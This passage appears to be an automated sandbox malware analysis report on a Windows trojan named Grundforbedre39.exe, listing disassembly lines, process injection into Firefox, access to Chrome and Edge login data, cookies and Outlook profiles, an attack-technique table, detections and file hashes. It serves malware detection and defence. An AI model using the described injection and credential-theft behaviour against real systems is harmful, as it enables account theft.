        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_3554C640 mov eax, dword ptr fs:[00000030h]4_2_3554C640
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_3550D64A mov eax, dword ptr fs:[00000030h]4_2_3550D64A
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_3550D64A mov eax, dword ptr fs:[00000030h]4_2_3550D64A
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_35510670 mov eax, dword ptr fs:[00000030h]4_2_35510670
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_35552670 mov eax, dword ptr fs:[00000030h]4_2_35552670
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_35552670 mov eax, dword ptr fs:[00000030h]4_2_35552670
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_35523660 mov eax, dword ptr fs:[00000030h]4_2_35523660
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_35523660 mov eax, dword ptr fs:[00000030h]4_2_35523660
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_35523660 mov eax, dword ptr fs:[00000030h]4_2_35523660
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_35507662 mov eax, dword ptr fs:[00000030h]4_2_35507662
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_35507662 mov eax, dword ptr fs:[00000030h]4_2_35507662
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_35507662 mov eax, dword ptr fs:[00000030h]4_2_35507662
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_3554666D mov esi, dword ptr fs:[00000030h]4_2_3554666D
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_3554666D mov eax, dword ptr fs:[00000030h]4_2_3554666D
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_3554666D mov eax, dword ptr fs:[00000030h]4_2_3554666D
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_355A3608 mov eax, dword ptr fs:[00000030h]4_2_355A3608
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_355A3608 mov eax, dword ptr fs:[00000030h]4_2_355A3608
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_355A3608 mov eax, dword ptr fs:[00000030h]4_2_355A3608
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_355A3608 mov eax, dword ptr fs:[00000030h]4_2_355A3608
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_355A3608 mov eax, dword ptr fs:[00000030h]4_2_355A3608
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_355A3608 mov eax, dword ptr fs:[00000030h]4_2_355A3608
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_3553D600 mov eax, dword ptr fs:[00000030h]4_2_3553D600
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_3553D600 mov eax, dword ptr fs:[00000030h]4_2_3553D600
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_355CF607 mov eax, dword ptr fs:[00000030h]4_2_355CF607
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_3554360F mov eax, dword ptr fs:[00000030h]4_2_3554360F
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_355E4600 mov eax, dword ptr fs:[00000030h]4_2_355E4600
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_35510630 mov eax, dword ptr fs:[00000030h]4_2_35510630
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_35540630 mov eax, dword ptr fs:[00000030h]4_2_35540630
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_35598633 mov esi, dword ptr fs:[00000030h]4_2_35598633
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_35598633 mov eax, dword ptr fs:[00000030h]4_2_35598633
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_35598633 mov eax, dword ptr fs:[00000030h]4_2_35598633
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_35517623 mov eax, dword ptr fs:[00000030h]4_2_35517623
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_35515622 mov eax, dword ptr fs:[00000030h]4_2_35515622
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_35515622 mov eax, dword ptr fs:[00000030h]4_2_35515622
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_3554C620 mov eax, dword ptr fs:[00000030h]4_2_3554C620
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_3553D6D0 mov eax, dword ptr fs:[00000030h]4_2_3553D6D0
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_355106CF mov eax, dword ptr fs:[00000030h]4_2_355106CF
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_3558C6F2 mov eax, dword ptr fs:[00000030h]4_2_3558C6F2
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_3558C6F2 mov eax, dword ptr fs:[00000030h]4_2_3558C6F2
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_355096E0 mov eax, dword ptr fs:[00000030h]4_2_355096E0
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_355096E0 mov eax, dword ptr fs:[00000030h]4_2_355096E0
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_3551C6E0 mov eax, dword ptr fs:[00000030h]4_2_3551C6E0
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_355156E0 mov eax, dword ptr fs:[00000030h]4_2_355156E0
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_355156E0 mov eax, dword ptr fs:[00000030h]4_2_355156E0
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_355156E0 mov eax, dword ptr fs:[00000030h]4_2_355156E0
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_355366E0 mov eax, dword ptr fs:[00000030h]4_2_355366E0
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_355366E0 mov eax, dword ptr fs:[00000030h]4_2_355366E0
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_35518690 mov eax, dword ptr fs:[00000030h]4_2_35518690
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_3558D69D mov eax, dword ptr fs:[00000030h]4_2_3558D69D
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_355CF68C mov eax, dword ptr fs:[00000030h]4_2_355CF68C
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_35520680 mov eax, dword ptr fs:[00000030h]4_2_35520680
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_35520680 mov eax, dword ptr fs:[00000030h]4_2_35520680
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_35520680 mov eax, dword ptr fs:[00000030h]4_2_35520680
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_35520680 mov eax, dword ptr fs:[00000030h]4_2_35520680
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_35520680 mov eax, dword ptr fs:[00000030h]4_2_35520680
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_35520680 mov eax, dword ptr fs:[00000030h]4_2_35520680
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_35520680 mov eax, dword ptr fs:[00000030h]4_2_35520680
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_35520680 mov eax, dword ptr fs:[00000030h]4_2_35520680
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_35520680 mov eax, dword ptr fs:[00000030h]4_2_35520680
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_35520680 mov eax, dword ptr fs:[00000030h]4_2_35520680
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_35520680 mov eax, dword ptr fs:[00000030h]4_2_35520680
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_35520680 mov eax, dword ptr fs:[00000030h]4_2_35520680
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_355D86A8 mov eax, dword ptr fs:[00000030h]4_2_355D86A8
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_355D86A8 mov eax, dword ptr fs:[00000030h]4_2_355D86A8
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_355E3157 mov eax, dword ptr fs:[00000030h]4_2_355E3157
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_355E3157 mov eax, dword ptr fs:[00000030h]4_2_355E3157
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_355E3157 mov eax, dword ptr fs:[00000030h]4_2_355E3157
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_3554415F mov eax, dword ptr fs:[00000030h]4_2_3554415F
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_355A314A mov eax, dword ptr fs:[00000030h]4_2_355A314A
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_355A314A mov eax, dword ptr fs:[00000030h]4_2_355A314A
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_355A314A mov eax, dword ptr fs:[00000030h]4_2_355A314A
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_355A314A mov eax, dword ptr fs:[00000030h]4_2_355A314A
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_355E5149 mov eax, dword ptr fs:[00000030h]4_2_355E5149
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_3550A147 mov eax, dword ptr fs:[00000030h]4_2_3550A147
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_3550A147 mov eax, dword ptr fs:[00000030h]4_2_3550A147
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_3550A147 mov eax, dword ptr fs:[00000030h]4_2_3550A147
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_35516179 mov eax, dword ptr fs:[00000030h]4_2_35516179
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_3554716D mov eax, dword ptr fs:[00000030h]4_2_3554716D
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_3550F113 mov eax, dword ptr fs:[00000030h]4_2_3550F113
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_3550F113 mov eax, dword ptr fs:[00000030h]4_2_3550F113
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_3550F113 mov eax, dword ptr fs:[00000030h]4_2_3550F113
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_3550F113 mov eax, dword ptr fs:[00000030h]4_2_3550F113
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_3550F113 mov eax, dword ptr fs:[00000030h]4_2_3550F113
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_3550F113 mov eax, dword ptr fs:[00000030h]4_2_3550F113
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_3550F113 mov eax, dword ptr fs:[00000030h]4_2_3550F113
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_3550F113 mov eax, dword ptr fs:[00000030h]4_2_3550F113
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_3550F113 mov eax, dword ptr fs:[00000030h]4_2_3550F113
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_3550F113 mov eax, dword ptr fs:[00000030h]4_2_3550F113
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_3550F113 mov eax, dword ptr fs:[00000030h]4_2_3550F113
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_3550F113 mov eax, dword ptr fs:[00000030h]4_2_3550F113
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_3550F113 mov eax, dword ptr fs:[00000030h]4_2_3550F113
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_3550F113 mov eax, dword ptr fs:[00000030h]4_2_3550F113

        HIPS / PFW / Operating System Protection Evasion

        Source: C:\Windows\SysWOW64\netiougc.exe; Memory written: C:\Program Files\Mozilla Firefox\firefox.exe base: 7FF77A870000 value starts with: 4D5A
        Source: C:\Users\user\Desktop\Grundforbedre39.exe; Section loaded: NULL target: C:\Program Files (x86)\ERtdTuDynHEWlexRohovBzgsqckTyNaQESBJWivIAgzOBz\aBVmlEGlXzPgSgzWbUWNbhsRlSOqo.exe protection: execute and read and write
        Source: C:\Users\user\Desktop\Grundforbedre39.exe; Section loaded: NULL target: C:\Windows\SysWOW64\netiougc.exe protection: execute and read and write
        Source: C:\Windows\SysWOW64\netiougc.exe; Section loaded: NULL target: C:\Program Files (x86)\ERtdTuDynHEWlexRohovBzgsqckTyNaQESBJWivIAgzOBz\aBVmlEGlXzPgSgzWbUWNbhsRlSOqo.exe protection: read write
        Source: C:\Windows\SysWOW64\netiougc.exe; Section loaded: NULL target: C:\Program Files (x86)\ERtdTuDynHEWlexRohovBzgsqckTyNaQESBJWivIAgzOBz\aBVmlEGlXzPgSgzWbUWNbhsRlSOqo.exe protection: execute and read and write
        Source: C:\Windows\SysWOW64\netiougc.exe; Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
        Source: C:\Windows\SysWOW64\netiougc.exe; Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write
        Source: C:\Windows\SysWOW64\netiougc.exe; Thread APC queued: target process: C:\Program Files (x86)\ERtdTuDynHEWlexRohovBzgsqckTyNaQESBJWivIAgzOBz\aBVmlEGlXzPgSgzWbUWNbhsRlSOqo.exe
        Source: C:\Windows\SysWOW64\netiougc.exe; Memory written: C:\Program Files\Mozilla Firefox\firefox.exe base: 7FF77A870000
        Source: C:\Users\user\Desktop\Grundforbedre39.exe; Process created: C:\Users\user\Desktop\Grundforbedre39.exe C:\Users\user\Desktop\Grundforbedre39.exe
        Source: C:\Program Files (x86)\ERtdTuDynHEWlexRohovBzgsqckTyNaQESBJWivIAgzOBz\aBVmlEGlXzPgSgzWbUWNbhsRlSOqo.exe; Process created: C:\Windows\SysWOW64\netiougc.exe C:\Windows\SysWOW64\netiougc.exe
        Source: C:\Windows\SysWOW64\netiougc.exe; Process created: C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\Firefox.exe
        Source: C:\Users\user\Desktop\Grundforbedre39.exe; Code function: 0_2_0040326A EntryPoint,LdrInitializeThunk,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,LdrInitializeThunk,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,LdrInitializeThunk,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,LdrInitializeThunk,ExitWindowsEx,ExitProcess

        Stealing of Sensitive Information

        Source: Yara match; File source: 00000019.00000002.5892016375.0000000000E30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara match; File source: 0000000A.00000002.5887373637.00000000004A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara match; File source: 00000009.00000002.5892807319.0000000004CA0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
        Source: Yara match; File source: 00000004.00000002.1279164974.0000000038030000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara match; File source: 0000000A.00000002.5894036244.0000000002B60000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match; File source: 0000000A.00000002.5893764662.0000000002B10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match; File source: 00000004.00000002.1278316788.00000000351C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: C:\Windows\SysWOW64\netiougc.exe; File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
        Source: C:\Windows\SysWOW64\netiougc.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
        Source: C:\Windows\SysWOW64\netiougc.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
        Source: C:\Windows\SysWOW64\netiougc.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
        Source: C:\Windows\SysWOW64\netiougc.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
        Source: C:\Windows\SysWOW64\netiougc.exe; Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

        Remote Access Functionality

        Source: Yara match; File source: 00000019.00000002.5892016375.0000000000E30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara match; File source: 0000000A.00000002.5887373637.00000000004A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara match; File source: 00000009.00000002.5892807319.0000000004CA0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
        Source: Yara match; File source: 00000004.00000002.1279164974.0000000038030000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara match; File source: 0000000A.00000002.5894036244.0000000002B60000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match; File source: 0000000A.00000002.5893764662.0000000002B10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match; File source: 00000004.00000002.1278316788.00000000351C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

        | Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact |
        |---|---|---|---|---|---|---|---|---|---|---|---|---|---|
        | Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 1 Native API | 1 DLL Side-Loading | 1 Access Token Manipulation | 1 Masquerading | 1 OS Credential Dumping | 21 Security Software Discovery | Remote Services | 1 Email Collection | 11 Encrypted Channel | Exfiltration Over Other Network Medium | 1 System Shutdown/Reboot |
        | Credentials | Domains | Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | 411 Process Injection | 2 Virtualization/Sandbox Evasion | LSASS Memory | 2 Virtualization/Sandbox Evasion | Remote Desktop Protocol | 1 Archive Collected Data | 3 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service |
        | Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | 1 DLL Side-Loading | 1 Access Token Manipulation | Security Account Manager | 1 Process Discovery | SMB/Windows Admin Shares | 1 Data from Local System | 4 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact |
        | Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 411 Process Injection | NTDS | 1 Application Window Discovery | Distributed Component Object Model | 1 Clipboard Data | 5 Application Layer Protocol | Traffic Duplication | Data Destruction |
        | Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 Deobfuscate/Decode Files or Information | LSA Secrets | 2 File and Directory Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact |
        | Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 2 Obfuscated Files or Information | Cached Domain Credentials | 4 System Information Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop |
        | DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 1 DLL Side-Loading | DCSync | Remote System Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery |
        [Behavior graph: ID 1410990; sample Grundforbedre39.exe; start date 18/03/2024; architecture WINDOWS; score 100. Process chain: Grundforbedre39.exe (drops System.dll) started Grundforbedre39.exe, which injected aBVmlEGlXzPgSgzWbUWNbhsRlSOqo.exe, which started netiougc.exe, which injected aBVmlEGlXzPgSgzWbUWNbhsRlSOqo.exe and started firefox.exe.]

        Source | Detection | Scanner | Label | Link
        Grundforbedre39.exe | 100% | Avira | HEUR/AGEN.1361137 |
        Grundforbedre39.exe | 24% | ReversingLabs | Win32.Trojan.InjectorX |
        Source | Detection | Scanner | Label | Link
        C:\Users\user\AppData\Local\Temp\nsoA79F.tmp\System.dll | 0% | ReversingLabs | |
        No Antivirus matches
        No Antivirus matches
        Joe Sandbox version: 40.0.0 Tourmaline
        Analysis ID: 1410990
        Start date and time: 2024-03-18 14:43:54 +01:00
        Joe Sandbox product: CloudBasic
        Overall analysis duration: 0h 18m 36s
        Hypervisor based Inspection enabled: false
        Report type: full
        Cookbook file name: default.jbs
        Analysis system description: Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, Chrome 93, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
        Run name: Suspected Instruction Hammering
        Number of analysed new started processes analysed: 31
        Number of new started drivers analysed: 0
        Number of existing processes analysed: 0
        Number of existing drivers analysed: 0
        Number of injected processes analysed: 2
        Technologies:
        • HCA enabled
        • EGA enabled
        • AMSI enabled
        Analysis Mode: default
        Analysis stop reason: Timeout
        Sample name: Grundforbedre39.exe
        Detection: MAL
        Classification: mal100.troj.spyw.evad.winEXE@7/10@60/12
        EGA Information:
        • Successful, ratio: 66.7%
        HCA Information:
        • Successful, ratio: 93%
        • Number of executed functions: 90
        • Number of non-executed functions: 293
        Cookbook Comments:
        • Found application associated with file extension: .exe
        • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
        • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, BackgroundTransferHost.exe, RuntimeBroker.exe, WMIADAP.exe, backgroundTaskHost.exe, SgrmBroker.exe, MoUsoCoreWorker.exe, conhost.exe, svchost.exe
        • Excluded domains from analysis (whitelisted): www.bing.com, client.wns.windows.com, fs.microsoft.com, login.live.com, ctldl.windowsupdate.com, tse1.mm.bing.net, settings-win.data.microsoft.com, g.bing.com, arc.msn.com
        • Execution Graph export aborted for target aBVmlEGlXzPgSgzWbUWNbhsRlSOqo.exe, PID 2820 because it is empty
        • HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
        • HTTPS proxy raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
        • Not all processes where analyzed, report is missing behavior information
        • Report creation exceeded maximum time and may have missing disassembly code information.
        • Report size exceeded maximum capacity and may have missing behavior information.
        • Report size getting too big, too many NtOpenKeyEx calls found.
        • Report size getting too big, too many NtProtectVirtualMemory calls found.
        • Report size getting too big, too many NtQueryValueKey calls found.
        • VT rate limit hit for: Grundforbedre39.exe
        Time | Type | Description
        14:48:14 | API Interceptor | 39442811x Sleep call for process: netiougc.exe modified
                                                                                    Process:C:\Windows\SysWOW64\netiougc.exe
                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3036000, page size 2048, file counter 7, database pages 59, cookie 0x52, schema 4, UTF-8, version-valid-for 7
                                                                                    Category:dropped
                                                                                    Size (bytes):122880
                                                                                    Entropy (8bit):1.1414673161713362
                                                                                    Encrypted:false
                                                                                    SSDEEP:192:8t4nKTjebGA7j9p/XH9eQ3KvphCNKRmquPWTPVusE6:8t4n/9p/39J6hwNKRmqu+7VusE
                                                                                    MD5:24937DB267D854F3EF5453E2E54EA21B
                                                                                    SHA1:F519A77A669D9F706D5D537A203B7245368D40CE
                                                                                    SHA-256:369B8B4465FB5FD7F12258C7DEA941F9CCA9A90C78EE195DF5E02028686869ED
                                                                                    SHA-512:AED398C6781300E732105E541A6FDD762F04E0EC5A5893762BFDCBDD442348FAF9CB2711EFDC4808D4675A8E48F77BEAB3A0D6BC635B778D47B2DADC9B6086A3
                                                                                    Malicious:false
                                                                                    Reputation:moderate, very likely benign file
                                                                                    Process:C:\Users\user\Desktop\Grundforbedre39.exe
                                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):11776
                                                                                    Entropy (8bit):5.656126712214018
                                                                                    Encrypted:false
                                                                                    SSDEEP:192:em24sihno00Wfl97nH6T2enXwWobpWBTU4VtHT7dmN35OlESl:m8QIl975eXqlWBrz7YLOlE
                                                                                    MD5:A4DD044BCD94E9B3370CCF095B31F896
                                                                                    SHA1:17C78201323AB2095BC53184AA8267C9187D5173
                                                                                    SHA-256:2E226715419A5882E2E14278940EE8EF0AA648A3EF7AF5B3DC252674111962BC
                                                                                    SHA-512:87335A43B9CA13E1300C7C23E702E87C669E2BCF4F6065F0C684FC53165E9C1F091CC4D79A3ECA3910F0518D3B647120AC0BE1A68EAADE2E75EAA64ADFC92C5A
                                                                                    Malicious:false
                                                                                    Antivirus:
                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                    Joe Sandbox View:
                                                                                    • Filename: comprobante de transferencia.exe, Detection: malicious, Browse
                                                                                    • Filename: cuenta para pago1.exe, Detection: malicious, Browse
                                                                                    • Filename: venerationens.exe, Detection: malicious, Browse
                                                                                    • Filename: venerationens.exe, Detection: malicious, Browse
                                                                                    • Filename: Interviewed.exe, Detection: malicious, Browse
                                                                                    • Filename: Interviewed.exe, Detection: malicious, Browse
                                                                                    • Filename: Arborean.exe, Detection: malicious, Browse
                                                                                    • Filename: Medarbejderstabens189.exe, Detection: malicious, Browse
                                                                                    • Filename: Afslrings.exe, Detection: malicious, Browse
                                                                                    Reputation:moderate, very likely benign file
                                                                                    Process:C:\Users\user\Desktop\Grundforbedre39.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):200432
                                                                                    Entropy (8bit):3.234993383739913
                                                                                    Encrypted:false
                                                                                    SSDEEP:3072:MbK3xS/itsupP4zlLPatE1650lNzpANsqud:x2K16zJa2Qwd
                                                                                    MD5:910B94BB45EC253A90F4CA8FA56BC584
                                                                                    SHA1:ED29E140FE94207B697953B8D1466F7C02F4E60E
                                                                                    SHA-256:BE72DFD9F250BBD69DCFD4508D08A327CBB9B3FBB11964FD5F66BEE35A9FD5C9
                                                                                    SHA-512:93C902D3EC6959BBFA801D13A787A157A998B3615E69EFA205D0952FA6A9935AB699E62316A20F5DB0682DA340FAC8B8454272DDFE9C82D7C16CF57FBB6EE1A0
                                                                                    Malicious:false
                                                                                    Reputation:low
                                                                                    Process:C:\Users\user\Desktop\Grundforbedre39.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):236303
                                                                                    Entropy (8bit):7.7883491378816885
                                                                                    Encrypted:false
                                                                                    SSDEEP:6144:ber1IK40yyVlVHGsp69EHf7tm+X3A8n0LC:KaMVlwsi4Yk0O
                                                                                    MD5:4386E4D05A2CE413246DF9930185A660
                                                                                    SHA1:C1D82A8FF3E009BDF3821CCA19C5EEFB104C3BBA
                                                                                    SHA-256:0F908E84C753998701648FBB8C3165E8B121C9153033570D481A314786A34D0B
                                                                                    SHA-512:B27739B5006E0265306100B50CCF665048D4A44F32DF249A3A0DD1EDD236062ED198F27F79EF1760FC639F3873F4D303A2461AD33F951E13FA806C64D020C663
                                                                                    Malicious:false
                                                                                    Process:C:\Users\user\Desktop\Grundforbedre39.exe
                                                                                    File Type:GTA audio index data (SDT)
                                                                                    Category:dropped
                                                                                    Size (bytes):53468
                                                                                    Entropy (8bit):4.565460115431186
                                                                                    Encrypted:false
                                                                                    SSDEEP:768:Io23DAPp+XOzBVhf52yaEpeFab4rGVnhKmwxgQH26a3SszPAENOhO4VUxu:IoaDADThHxpeoEqzC9s7QhO4J
                                                                                    MD5:E3BE96075AE2412EA89A85B681A0EE0A
                                                                                    SHA1:ACA8F411FB66B98F3886C76586BBFAC984AB2712
                                                                                    SHA-256:6D4AA4D0AF94B1C59A822E4CE044434E24B79874F5D915DAED68EF3A0D815A26
                                                                                    SHA-512:4BAFF06C296306802FDCC58853AAAED1427285F0D30361DF785FD9AB115DD049E9424CCC1D2B7A1FC96480543E2737AEA5346E378732081921F6E7FED3B165CF
                                                                                    Malicious:false
                                                                                    Process:C:\Users\user\Desktop\Grundforbedre39.exe
                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):453
                                                                                    Entropy (8bit):4.317248216463251
                                                                                    Encrypted:false
                                                                                    SSDEEP:12:pUVo0WmtKoENHeo6fAy/22Xe7V9Ec/BZMIjbAl4WOE:KjKb9Vyul59JXehn
                                                                                    MD5:9F716DE9908957BD324DCC4ADA5A33F7
                                                                                    SHA1:5AA93CFD2DF40B9ED1F46A728EEE203258DC05DD
                                                                                    SHA-256:CDBC11AE1032690D95484A15A78C94AECFEE10103E26372894547D7B25C01A94
